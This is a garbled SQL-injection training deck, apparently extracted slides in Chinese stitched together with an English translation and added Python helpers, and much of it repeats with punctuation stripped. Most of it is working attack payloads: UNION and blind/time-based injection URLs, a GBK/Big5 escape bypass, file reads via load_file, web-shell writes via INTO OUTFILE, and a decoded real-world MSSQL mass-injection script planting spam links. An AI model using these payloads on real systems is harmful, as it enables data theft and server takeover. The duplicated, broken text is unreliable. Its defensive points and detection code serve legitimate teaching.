bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL real-world case – automated injection by 116jurist.ru (2/4)
• 2012/12/xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x… +as+varchar(8000))+exec(@s)-- (hex-encoded T-SQL omitted; decoded on slide 4/4)
MSSQL real-world case – automated injection by 116jurist.ru (3/4)
• 2012/12/xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x… +as+varchar(8000))+exec(@s)-- (hex-encoded T-SQL omitted; decoded on slide 4/4)
MSSQL real-world case – automated injection by 116jurist.ru, decoded (4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru>юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
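An added example, not part of the slides, that does in code what slide 4/4 does by hand: it pulls the hex out of a logged cast(0x… as varchar(8000)) request, decodes it and flags the cursor-driven mass UPDATE. The log query strings and the short hex blob are constructed here; Windows-1251 is an assumed charset, chosen because the campaign's link text decodes as Russian.

```python
"""Decode and flag hex-wrapped T-SQL in web request logs.

Added example (not from the original slides). The 116jurist.ru requests
hide their T-SQL inside cast(0x... as varchar(8000)) so the query string
carries no quotes; exec(@s) then runs the decoded text. This helper pulls
the hex out of a logged query string, decodes it and reports the fragments
that mark a mass-injection attempt. The sample query strings are
constructed for illustration, with a short stand-in for the real 8000-byte
blob.
"""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Fragments characteristic of the cursor-driven mass UPDATE shown on slide 4/4.
MARKERS = ("INFORMATION_SCHEMA", "Table_Cursor", "EXEC(", "<script", "<a href=")

HEX_CAST = re.compile(r"cast\(0x([0-9a-fA-F]+)\s+as\s+(?:n?varchar|char)", re.IGNORECASE)
EXEC_VAR = re.compile(r"exec\s*\(\s*@\w+\s*\)", re.IGNORECASE)


def decode_hex_payloads(query_string: str, charset: str = "cp1251") -> List[str]:
    """Return the decoded text of every cast(0x... as varchar) in the query.

    charset: Windows-1251 is assumed because the link text in the third stage
    of the campaign decodes as Russian; plain ASCII SQL decodes identically.
    """
    decoded = []
    qs = unquote_plus(query_string)          # "+" and %XX back to characters
    for hexstr in HEX_CAST.findall(qs):
        if len(hexstr) % 2:
            continue                         # odd length: not a byte string, leave for review
        decoded.append(bytes.fromhex(hexstr).decode(charset, errors="replace"))
    return decoded


def classify(query_string: str) -> Dict[str, object]:
    """Summarise a request: decoded SQL, matched markers and a verdict."""
    sql_texts = decode_hex_payloads(query_string)
    hits = sorted({m for s in sql_texts for m in MARKERS if m.lower() in s.lower()})
    exec_seen = EXEC_VAR.search(unquote_plus(query_string)) is not None
    return {
        "decoded": sql_texts,
        "markers": hits,
        "suspicious": bool(sql_texts) and (exec_seen or bool(hits)),
    }


# Constructed sample: the shape of the logged request, with a short stand-in
# for the hex blob (the opening of the stage-1 script on slide 4/4).
STAGE_SQL = ("set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) "
             "DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME "
             "from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t")
SAMPLE_QUERY = ("Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x"
                + STAGE_SQL.encode("cp1251").hex()
                + "+as+varchar(8000))+exec(@s)--")
BENIGN_QUERY = "Serno=51&page=2"

if __name__ == "__main__":
    for q in (SAMPLE_QUERY, BENIGN_QUERY):
        print(classify(q))
```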
References
• 吳翰清, 網路竟然這麼危險 (白帽子讲Web安全), 2012
• MySQL String Functions, 5.1
• MySQL Miscellaneous Functions, 5.1
• MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话 (MySQL/PHP: writing a one-line shell with load_file/outfile when single quotes are escaped)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Injection attack techniques – UNION
• PHP+MySQL does not support stacked (multi-statement) queries, so a UNION query is used instead
  – Vulnerable SQL statement, parameter without quotes (PHP example)
    • SELECT * FROM `member` WHERE `id` = $id
  – Attack example without quotes
    • http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNION+SELECT+1,2,3,4
  – Statement actually executed
    • SELECT * FROM `member` WHERE `id` = 1 AND 1=2 UNION SELECT 1,2,3,4
SQL Injection attack techniques – UNION
• PHP+MySQL does not support stacked (multi-statement) queries, so a UNION query is used instead
• Vulnerable SQL statement, parameter with quotes (PHP example)
  – SELECT * FROM `member` WHERE `name` like '$name'
• Attack example
  – http://www.hackdemo.com/searchUser.php?name=h'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()%23
• Statement actually executed
  – SELECT * FROM `member` WHERE `name` like 'h'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()#'
SQL Injection attack techniques – successfully controlling the statement
SQL Injection attack techniques – guessing data
• Get the length
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=1
  – …
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=7
• Guess the data
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='a'
  – …
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='w'
SQL Injection attack techniques – reading and writing files
• Read data and write it to a file
  – http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:\Website\www.hackdemo.com\member.txt'
• Write a backdoor
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+"<?php system($_GET['cmd'])?>",2,3,4+into+outfile+'D:\Website\www.hackdemo.com\cmd.php'
With escaping added and error messages turned off, is it safe now?
SQL Blind Injection
• Blind SQL injection (SQL Blind Injection) is also a type of SQL injection. Ordinary SQL injection relies on error messages to build the attack statement; blind injection relies entirely on whether the injected statement evaluates true or false.
• SQL Blind Injection
  – Ordinary blind injection
  – Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (1/2)
• Use a time delay to tell whether the SQL statement was executed
• Techniques
  – Built-in functions
    • BENCHMARK(count, expr)
    • SLEEP(seconds)
      – MySQL >= 5
  – Build statements that take a long time to run (heavy queries)
Time-Based Blind SQL Injection – using heavy queries (2/2)
Time-Based Blind SQL Injection – guessing the database name through the time delay
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
• …
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
SQL Injection attack techniques – bypassing escaped characters
• ASCII encoding
  – ASCII(), CHAR()
  – Single character
    • CHAR(68)
  – Multiple characters
    • CHAR(68,58,92)
• Hexadecimal encoding
  – HEX()
  – 0x443A5C
• Double-byte escape technique
SQL Injection attack techniques – guessing data (bypassing escaping)
• Guess the columns
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
• Guess the column data
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
  – …
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
SQL Injection attack techniques – reading data (bypassing escaping)
• Read data and write it to a file
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
SQL Injection attack techniques – writing a file (when the quote restriction cannot be bypassed)
1. Find phpMyAdmin
2. Remote MySQL
mysql> use xssdb;
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a decodes to:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
The file written contains:
<?php @eval($_POST['cmd']);?>
SQL Injection attack techniques – double-byte escape technique (1/3)
• The injected encoded byte and the backslash (0x5c) added by escaping recombine into one character, bypassing the escaping restriction
• Scenario
  – Escape handling
    • addslashes
    • mysql_escape_string
    • php.ini
      – magic_quotes_gpc on
  – BIG5 or GBK encoding in use
    • set names gbk / set names big5
SQL Injection attack techniques – double-byte escape technique (2/3)
• Chinese text is represented with two bytes
  – Big5
    • High byte 0x81-0xFE, low byte 0x40-0x7E or 0xA1-0xFE
  – GBK
    • Lead byte 0x81-0xFE, trail byte 0x40-0x7E
  – GB2312
    • Lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – Attack characters: BF, CC, D5 …
SQL Injection attack techniques – double-byte escape technique (3/3)
• Bypassing escaping on a quoted parameter
  – http://www.hackdemo.com/searchUserLash.php?name=h%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
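An added example, not from the slides, that models the byte-level mechanism of slides 1/3 to 3/3 with Python's codecs: addslashes()-style escaping followed by decoding under gbk versus utf-8, which is the reason the defence slide says to use UTF-8; the input bytes are constructed.

```python
"""Why backslash escaping fails on a GBK/Big5 connection.

Added example, not from the original slides. It models the behaviour the
slides describe: a byte-oriented escaper such as addslashes() or
mysql_escape_string() puts 0x5C in front of a quote; when the connection
charset is a multibyte one, a preceding lead byte (0xBF here, one of the
"attack characters" listed above) swallows that 0x5C as its trail byte, so
the quote reaches the parser unescaped. The same bytes under UTF-8 keep
the backslash as a separate character. Input bytes are constructed.
"""


def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping like PHP's addslashes(): prefix ' " \\ and NUL with \\."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes a server decoding `escaped` in `charset` sees as unescaped.

    A backslash absorbed into a multibyte character no longer protects the
    quote that follows it.
    """
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2            # the escape consumes the next character
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def is_escaping_sufficient(raw: bytes, charset: str) -> bool:
    """Does addslashes() neutralise every quote for this connection charset?"""
    return unescaped_quotes(addslashes(raw), charset) == 0


if __name__ == "__main__":
    probe = b"h\xbf'"        # constructed: 'h', lead byte 0xBF, then a quote
    for cs in ("gbk", "utf-8"):
        verdict = "safe" if is_escaping_sufficient(probe, cs) else "UNSAFE"
        print(cs, addslashes(probe).hex(), verdict)
```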
SQL Column Truncation – introduction (1/3)
• MySQL SQL mode
  – STRICT_ALL_TABLES not enabled
    • Inserting data longer than the column produces a warning
    • But the data is still inserted
  – STRICT_ALL_TABLES enabled
    • Inserting data longer than the column produces a message
    • ERROR 1406 is raised and the row is not inserted
• Incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation – effect (2/3)
SQL Column Truncation – defences (3/3)
• Actively strip whitespace from strings that must not contain it
  – e.g. account names
• Add the BINARY keyword when SELECTing the data
• Configure MySQL to compare as BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
  – Exceeding the column length raises an ERROR rather than a WARNING
  – To avoid errors on insert, extra checks may be needed when inserting or updating
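An added example, not from the slides, that models the non-strict truncation and trailing-space-insensitive (PAD SPACE) comparison behind the effect slide, and implements the whitespace/length check and BINARY comparison recommended above; the 16-character column width is an assumption and the model is not MySQL itself.

```python
"""SQL column truncation: a model of the effect and the input check.

Added example, not from the original slides. MySQL without
STRICT_ALL_TABLES silently cuts an over-long value to the column width,
and its default (PAD SPACE) collations ignore trailing spaces when
comparing strings. This model reproduces both rules on an assumed
VARCHAR(16) username column so the collision becomes visible, and shows
the checks the defence slide recommends. It is a model, not MySQL.
"""

COLUMN_WIDTH = 16  # assumed width of the username column


def nonstrict_store(value: str, width: int = COLUMN_WIDTH) -> str:
    """Non-strict sql_mode: truncate to the column width with only a warning."""
    return value[:width]


def strict_store(value: str, width: int = COLUMN_WIDTH) -> str:
    """STRICT_ALL_TABLES: over-long data is rejected (ERROR 1406)."""
    if len(value) > width:
        raise ValueError("ERROR 1406: Data too long for column")
    return value


def pad_space_equal(a: str, b: str) -> bool:
    """Default non-binary collation: trailing spaces are not significant."""
    return a.rstrip(" ") == b.rstrip(" ")


def binary_equal(a: str, b: str) -> bool:
    """SELECT ... WHERE BINARY name = ?: every byte must match."""
    return a == b


def validate_username(name: str, width: int = COLUMN_WIDTH) -> str:
    """Application-side check: no whitespace anywhere, and within the column width."""
    if any(ch.isspace() for ch in name):
        raise ValueError("username must not contain whitespace")
    if len(name) > width:
        raise ValueError("username longer than %d characters" % width)
    return name


def registration_collides(existing: str, submitted: str) -> bool:
    """Would a non-strict INSERT of `submitted` produce a row that a PAD SPACE
    lookup for `existing` also returns? A uniqueness check on the raw,
    untruncated `submitted` string does not catch this."""
    stored = nonstrict_store(submitted)
    return pad_space_equal(stored, existing)


if __name__ == "__main__":
    crafted = "admin" + " " * 11 + "x"   # 17 chars: differs from "admin" before truncation
    print(repr(nonstrict_store(crafted)), registration_collides("admin", crafted))
```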
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
